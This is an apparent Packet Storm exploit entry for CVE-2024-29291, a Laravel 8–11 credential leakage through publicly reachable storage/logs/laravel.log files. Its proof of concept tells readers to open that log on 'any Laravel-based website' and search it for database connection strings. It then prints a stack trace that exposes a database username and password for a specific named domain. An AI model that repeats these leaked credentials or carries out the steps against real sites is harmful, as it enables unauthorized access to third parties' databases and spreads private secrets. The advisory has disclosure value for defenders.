Lucene search

Huseein AmerPACKETSTORM:178210

HistoryApr 22, 2024 - 12:00 a.m.

Laravel Framework 11 Credential Disclosure

2024-04-2200:00:00

Huseein Amer

packetstormsecurity.com

laravel framework 11

credential leakage

cve-2024-29291

proof of concept

storage/logs/laravel.log

pdo->__construct

mysql:host

u429384055_jscv

jaly$$a0p0p0p0

sql1

7.1 High

AI Score

Confidence

Low

0.001 Low

EPSS

Percentile

41.8%

JSON

`# Exploit Title: Laravel Framework 11 - Credential Leakage  
# Google Dork: N/A  
# Date: [2024-04-19]  
# Exploit Author: Huseein Amer  
# Vendor Homepage: [https://laravel.com/]  
# Software Link: N/A  
# Version: 8.* - 11.* (REQUIRED)  
# Tested on: [N/A]  
# CVE : CVE-2024-29291  
  
Proof of concept:  
Go to any Laravel-based website and navigate to storage/logs/laravel.log.  
  
Open the file and search for "PDO->__construct('mysql:host=".  
The result:  
shell  
Copy code  
#0  
/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70):  
PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0',  
Array)  
#1  
/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46):  
Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...',  
'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)  
Credentials:  
Username: u429384055_jscv  
Password: Jaly$$a0p0p0p0  
Host: sql1...  
  
`